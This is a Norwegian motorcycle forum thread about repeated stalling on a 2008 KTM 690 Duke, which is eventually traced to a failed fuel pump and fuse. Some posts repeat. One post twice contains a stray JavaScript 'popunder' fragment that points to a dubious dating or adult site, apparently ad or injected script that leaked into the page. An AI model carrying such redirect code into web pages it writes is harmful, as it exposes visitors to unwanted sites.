Nice. Jeg sender deg en PM dersom det blir aktuelt.LarsE skrev: ↑12 jun 2018, 17:53 Hvis du må bytte spjeldhuset så har muligens kompisen min en som passer. Tror nok han selger den en god del billigere enn det KTM skal ha for en ny. Når han skulle bestille ny så var det også ett par måneder ventetid her i Norge, han kan selvsagt sende omtrent på dagen.
KTM 690 Duke 2008 problemer
Re: KTM 690 Duke 2008 problemer
2019 KTM 790 Adventure
2008 KTM Duke 690
2008 KTM Duke 690
Re: KTM 690 Duke 2008 problemer
Går litt trått på verkstedet nå på sommeren, men nå har jeg omsider fått oppdatert informasjon. Var jo redd for at det var throttle body som måtte byttes, en del til ca. 9000 kr. Nå har de lagt inn en bestilling på en coil ellerno (jeg er helt amøbe på mekanikk ) som forhåpentligvis ankommer en gang ila. neste uke. En betraktelig billigere del. Så da er det bare å håpe at det løser problemet og at resten av sommeren forløper uten driftsstans...
2019 KTM 790 Adventure
2008 KTM Duke 690
2008 KTM Duke 690
Re: KTM 690 Duke 2008 problemer
Nå begynner jeg virkelig å få abstinenser her... været er jo helt konge og sykkelen står ennå på verkstedet. De venter på deler fra KTM som er forsinket. Pulser coil heter den delen de skal bytte, tror jeg, for den som har greie på slikt.
Jeg forstår at de er pålagt å følge arbeidsmiljøloven med fellesferie og det hele, men samtidig virker det nesten litt urimelig at mekanikerne skal kunne ta ferie midt i den korte norske MC-sesongen.
Jeg forstår at de er pålagt å følge arbeidsmiljøloven med fellesferie og det hele, men samtidig virker det nesten litt urimelig at mekanikerne skal kunne ta ferie midt i den korte norske MC-sesongen.
2019 KTM 790 Adventure
2008 KTM Duke 690
2008 KTM Duke 690
- haakeik
- Innlegg: 717
- Registrert: 17 mar 2016, 08:11
- Motorsykkelen din: 2013 Moto Guzzi Stelvio NTX 1200
- Sted: Asker området
Re: KTM 690 Duke 2008 problemer
Når motoren stopper, kutter den brått eller er det noe fusking først(som om du går tom for bensin)?
Hvis den kutter brått, kan det være at Pulser Coil (pick-up coil) er defekt og ny vil kurere feilen.
Har opplevd det selv på min Triumph.
En av tingene som kan skje ved en defekt Pulser Coil, er at når motoren blir så varm at varmen påvirker Pulser Coil'en, stopper den å sende signaler til det elektroniske tenningssystemet og motoren kutter brått. Når Pulser Coilen har fått kjølt seg nok ned, er det ikke noe problem å starte motoren og kjøre avgårde inntil Pulser Coil blir varm igjen. Det kan også være en feil med ledning eller kontakt til Pulser Coil.
https://www.triumphrat.net/t3-sport-tou ... stion.html
http://racetechelectric.com/ft-752-puls ... stems.html
Hvis den kutter brått, kan det være at Pulser Coil (pick-up coil) er defekt og ny vil kurere feilen.
Har opplevd det selv på min Triumph.
En av tingene som kan skje ved en defekt Pulser Coil, er at når motoren blir så varm at varmen påvirker Pulser Coil'en, stopper den å sende signaler til det elektroniske tenningssystemet og motoren kutter brått. Når Pulser Coilen har fått kjølt seg nok ned, er det ikke noe problem å starte motoren og kjøre avgårde inntil Pulser Coil blir varm igjen. Det kan også være en feil med ledning eller kontakt til Pulser Coil.
https://www.triumphrat.net/t3-sport-tou ... stion.html
http://racetechelectric.com/ft-752-puls ... stems.html
Re: KTM 690 Duke 2008 problemer
Litt begge deler igrunn... noen ganger slurver den litt men ikke lenge.
Jeg må jo bare anta at verkstedet vet hva de driver med. Pleier de å ta seg en tur for å teste sykkelen? Det virker nesten ikke sånn, men er ikke det den beste måten for å finne ut av problemet for en som har peiling? (Les: ikke meg)
Jeg blir litt oppgitt dersom det ikke løser seg etter bytte av pulser coil og jeg evt. må vente på enda en ny del osv. Men den tid, den sorg...
Nå sitter jeg og ser på leie av sykler. Har veldig lyst på en liten tur i helgen, men HIMMEL der er dyrt å leie motorsykkel i dette landet.
Sist redigert av Sakkle den 10 jul 2018, 12:53, redigert 1 gang totalt.
2019 KTM 790 Adventure
2008 KTM Duke 690
2008 KTM Duke 690
- gsx750_80
- Innlegg: 2212
- Registrert: 24 apr 2010, 19:34
- Motorsykkelen din: GSX 750 '80, Ninja 250R m.fl.
- Sted: Trøndelag
- Kontakt:
Re: KTM 690 Duke 2008 problemer
Ikke bare her til lands det er dyrt. Jeg forhørte meg om leie i San Diego-området for rundt 2.5 år siden. En Ninja 250R eller Suzuki Bandit 600 var billigst å leie. Der var prisen 49 USD i leie, pluss 35 USD i forsikring per dag, med minimum leieperiode 2 dager. Dvs ca 1000 kroner for 2 dager, med en dollarkurs typisk rundt 8.40.Sakkle skrev: ↑29 jun 2018, 14:31Litt begge deler igrunn... noen ganger slurver den litt men ikke lenge.
Jeg må jo bare anta at verkstedet vet hva de driver med. Pleier de å ta seg en tur for å teste sykkelen? Det virker nesten ikke sånn, men er ikke det den beste måten for å finne ut av problemet for en som har peiling? (Les: ikke meg)
Jeg blir litt oppgitt dersom det ikke løser seg etter bytte av pulser coil og jeg evt. må vente på enda en ny del osv. Men den tid, den sorg...
Nå sitter jeg å ser på leie av sykler. Har veldig lyst på en liten tur i helgen, men HIMMEL der er dyrt å leie motorsykkel i dette landet.
Det verste var overprisen på forsikring. Jeg kjøpte heller en Honda XL250R for 1140 USD, og solgte for 1000 USD 5 måneder etterpå.
Forsikring på XL250Ren den kostet ca 130 USD per år, dvs ca 0.36 USD per dag, dvs ca 1/100-del av det utleieselskapene tok..
Skulle man leie feks en HD var leieprisene på linje med hva det kostet å leie en "luksusbil".
Mulig CA-priser lå under her hjemme. Har ikke sjekket. Noen leier ut privat. Slik går det kanskje an å få en bedre deal enn hos profesjonelle aktører.
mvh
-gsx750_80
-gsx750_80
Re: KTM 690 Duke 2008 problemer
Eventyret fortsetter...
Fikk omsider henta sykkelen på verkstedet her på mandag. Denne gangen hadde de byttet noe batteri-relépakke-greier. Prøvekjørt sykkelen hadde de også og den gikk som ei kule kunne de fortelle. Tok en god tur runt i Oslo på ettermiddagen og den gikk fint i ca. 40 minutter. Sto og venta på klar bane i et kryss og da jeg dro på ut av krysset stoppet den igjen. Dyttet den inn på en parkeringsplass, surfa litt på mobilen, kjeda meg litt, og etter ca. 15 minutter startet sykkelen igjen. Litt oppgitt kjørte jeg rett hjem og parkerte. Hadde et lite håp om at det var jeg som kvelte sykkelen eller noe, så tok sjansen på å kjøre sykkel til jobb tirsdag.
DET ble litt av et eventyr. Driftsstans midt i en tunnel på vei til jobb. Sykkelen startet igjen, men først etter 25 minutter denne gangen. Rett utenfor jobb stoppet den igjen. På vei fra jobb kom jeg ikke langt før den stoppa ennå en gang. Denne gangen fikk jeg rett og slett ikke start igjen. Blinker en feilkode på "FI"-lampa. Muligens 4 lange, 1 kort som betyr "Fuel pump relay - short circuit to ground or open circuit" eller "Fuel pump relay - input signal too high". Prøvde å få start i et par timer men endte til slutt med å ringe forsikringsselskapet for å få kjørt sykkelen til verkstedet. Ferdig på jobb ca. 1600, hjemme ca. 2100. En tur som normalt tar 20-30 minutter.
Nå venter jeg på tilbakemelding om hva som kan være galt, men ikke umulig at jeg må bytte throttle body. Adjø feriepenger...
Kan virke som jeg har hatt noe uflaks med denne sykkelen. Vurderer også et evt. påkrav mot selger (privat), men jeg er en litt konflikt-sky fyr og tanken på det frister ikke veldig. På den annen side begynner det å nærme seg en betydelig sum i reparasjoner nå...
Tanken på å selge sykkelen har slått meg, men jeg synes ikke jeg kan selge en sykkel med en så betydelig feil.
Har i det minste hatt et par fine turer i sommer, men ikke den beste starten som ny MC-fører
');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
Fikk omsider henta sykkelen på verkstedet her på mandag. Denne gangen hadde de byttet noe batteri-relépakke-greier. Prøvekjørt sykkelen hadde de også og den gikk som ei kule kunne de fortelle. Tok en god tur runt i Oslo på ettermiddagen og den gikk fint i ca. 40 minutter. Sto og venta på klar bane i et kryss og da jeg dro på ut av krysset stoppet den igjen. Dyttet den inn på en parkeringsplass, surfa litt på mobilen, kjeda meg litt, og etter ca. 15 minutter startet sykkelen igjen. Litt oppgitt kjørte jeg rett hjem og parkerte. Hadde et lite håp om at det var jeg som kvelte sykkelen eller noe, så tok sjansen på å kjøre sykkel til jobb tirsdag.
DET ble litt av et eventyr. Driftsstans midt i en tunnel på vei til jobb. Sykkelen startet igjen, men først etter 25 minutter denne gangen. Rett utenfor jobb stoppet den igjen. På vei fra jobb kom jeg ikke langt før den stoppa ennå en gang. Denne gangen fikk jeg rett og slett ikke start igjen. Blinker en feilkode på "FI"-lampa. Muligens 4 lange, 1 kort som betyr "Fuel pump relay - short circuit to ground or open circuit" eller "Fuel pump relay - input signal too high". Prøvde å få start i et par timer men endte til slutt med å ringe forsikringsselskapet for å få kjørt sykkelen til verkstedet. Ferdig på jobb ca. 1600, hjemme ca. 2100. En tur som normalt tar 20-30 minutter.
Nå venter jeg på tilbakemelding om hva som kan være galt, men ikke umulig at jeg må bytte throttle body. Adjø feriepenger...
Kan virke som jeg har hatt noe uflaks med denne sykkelen. Vurderer også et evt. påkrav mot selger (privat), men jeg er en litt konflikt-sky fyr og tanken på det frister ikke veldig. På den annen side begynner det å nærme seg en betydelig sum i reparasjoner nå...
Tanken på å selge sykkelen har slått meg, men jeg synes ikke jeg kan selge en sykkel med en så betydelig feil.
Har i det minste hatt et par fine turer i sommer, men ikke den beste starten som ny MC-fører
');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
2019 KTM 790 Adventure
2008 KTM Duke 690
2008 KTM Duke 690
- AJ
- Administrator
- Innlegg: 37972
- Registrert: 30 sep 2006, 18:46
- Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
- Sted: Lunner på Hadeland
- Kontakt:
Re: KTM 690 Duke 2008 problemer
Uffda...!
Dette høres slett ikke bra ut.
Verkstedet kan neppe ha prøvd hardt nok når de sjekket om sykkelen var i orden. Eller mer korrekt, de har nok ikke prøvd lenge nok.
I mitt tilfelle med oljelekkasjen fra motoren på den nye 1290'en min, ble vi enige om at verkstedet skulle teste sykkelen over lengre tid i to dager på rad slik at man med størst mulig grad av sikkerhet kunne si at feilen var rettet. So far, so good .
Det virker ikke som at verkstedet der du har hatt sykkelen til rep. har gjort dette. Ellers ville de ha erfart samme feil som de du opplevde etter å ha fått sykkelen tilbake...
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
Re: KTM 690 Duke 2008 problemer
Nei... jeg tror du har et poeng. Det virker som om de har vanvittig mye å gjøre og ikke nok ansatte til å gjøre jobben. Det tar nesten alltid minst 10 minutter å få svar på telefon. Ofte gir jeg opp etter 15-20 minutter. Tydelig at de ikke leier inn sommervikarer i alle fall. Det er jo vanlig i andre bransjer...
Det har slått meg at det virker som om de feilsøker ved å bytte deler, heller en å finne feilen og deretter bytte den delen som det er noe galt med. Jeg aner ikke om dette er normal fremgangsmåte på verksteder. Jeg er helt amøbe på motor.
Det finnes jo bare ett KTM-verskted i Oslo, så jeg kan liksom ikke velge og vrake heller. Det finnes to andre verksteder i "nærheten" av Oslo men begge ligger litt langt unna for min smak.
2019 KTM 790 Adventure
2008 KTM Duke 690
2008 KTM Duke 690
- AJ
- Administrator
- Innlegg: 37972
- Registrert: 30 sep 2006, 18:46
- Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
- Sted: Lunner på Hadeland
- Kontakt:
Re: KTM 690 Duke 2008 problemer
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
Re: KTM 690 Duke 2008 problemer
Det er et av de to alternativene utenom AMD, ja.AJ skrev: ↑12 jul 2018, 20:57 Hva med Star Motor i Asker:
http://www.starmotor.no/?page=2&title=motorsykkel
Mulig jeg skulle ha ringt de og hørt hvordan kalenderen ser ut...
2019 KTM 790 Adventure
2008 KTM Duke 690
2008 KTM Duke 690
Re: KTM 690 Duke 2008 problemer
Du må få byttet bensinpumpe. Det har vært en del tull med bensinpumpene på 690 Duke og de oppfører seg som du beskriver. Når sykkelen stopper for deg så skru på tenningen og skru nødstopp bryteren av og på. Hvis pumpen er i orden så skal du høre at den summer ett par sekunder. Hvis ikke så er det her problemet er.
Typisk for problemet er at det blir verre over tid og at den starter igjen når pumpen har kjølt seg ned i 10-20 min.
En annen ting er at du betaler verkstedet for å fikse problemet, ikke for å prøve og feile for kundens regning.
Så her kan du klage. De har tatt seg betalt, men ikke fikset problement
Typisk for problemet er at det blir verre over tid og at den starter igjen når pumpen har kjølt seg ned i 10-20 min.
En annen ting er at du betaler verkstedet for å fikse problemet, ikke for å prøve og feile for kundens regning.
Så her kan du klage. De har tatt seg betalt, men ikke fikset problement
Mine sykler i dag
2016 Triumph Bonneville 1200
1938 DKW SB350
1980 Kawasaki Z1000 ST
1970 Triumph Tiger 650
1980 Honda CBX
1975 Norton Commando 850 MkIII
2010 BMW S1000 RR (bane)
2013 KTM SFX350 MX
2017 Yamaha WR450F enduro
1984 Yamaha RD500LC
2016 Triumph Bonneville 1200
1938 DKW SB350
1980 Kawasaki Z1000 ST
1970 Triumph Tiger 650
1980 Honda CBX
1975 Norton Commando 850 MkIII
2010 BMW S1000 RR (bane)
2013 KTM SFX350 MX
2017 Yamaha WR450F enduro
1984 Yamaha RD500LC
Re: KTM 690 Duke 2008 problemer
Ja... det høres riktig ut. Og jeg mener de nevnte bensinpumpa, og at det enten var selve pumpa eller reléet som styrer strømmen til den(?). Mener det var det reléet de byttet nå sist. Og AJ har nok helt rett i at de ikke har testet sykkelen nok.Kwak skrev: ↑12 jul 2018, 21:08 Du må få byttet bensinpumpe. Det har vært en del tull med bensinpumpene på 690 Duke og de oppfører seg som du beskriver. Når sykkelen stopper for deg så skru på tenningen og skru nødstopp bryteren av og på. Hvis pumpen er i orden så skal du høre at den summer ett par sekunder. Hvis ikke så er det her problemet er.
Typisk for problemet er at det blir verre over tid og at den starter igjen når pumpen har kjølt seg ned i 10-20 min.
Ja, det har jeg også tenkt litt på. Jeg er nok alt for snill og finner meg i alt for mye av dårlig service. Jeg er elendig til å prute også... Jeg er rett og slett ikke komfortabel med å konfrontere fagfolk der jeg selv har null peiling. Men, jeg bør nok tråkke ut av komfort-sonen og kreve at de trekker fra litt på sluttregninga, ja.
2019 KTM 790 Adventure
2008 KTM Duke 690
2008 KTM Duke 690
Re: KTM 690 Duke 2008 problemer
Har du fått ordna opp i trøbbelet?
Re: KTM 690 Duke 2008 problemer
I dag har jeg omsider fått henta sykkelen på verkstedet. Det viste seg at sikringen til bensinpumpa hadde gått. Dette ble byttet og gikk igjen umiddelbart. Bensinpumpa var gåen og ble byttet. 6300 kr totalt. På vei til jobb i dag oppførte den seg veldig bra. Håper det holder utover høsten også.
De ble ikke helt den sesongen jeg hadde håpet på, men med litt flaks får jeg noen fine solskinnsdager på tampen av sesongen
Fikk forøvrig med den ødelagte bensinpumpa, aner ikke hvorfor. Er dette vanlig?
2019 KTM 790 Adventure
2008 KTM Duke 690
2008 KTM Duke 690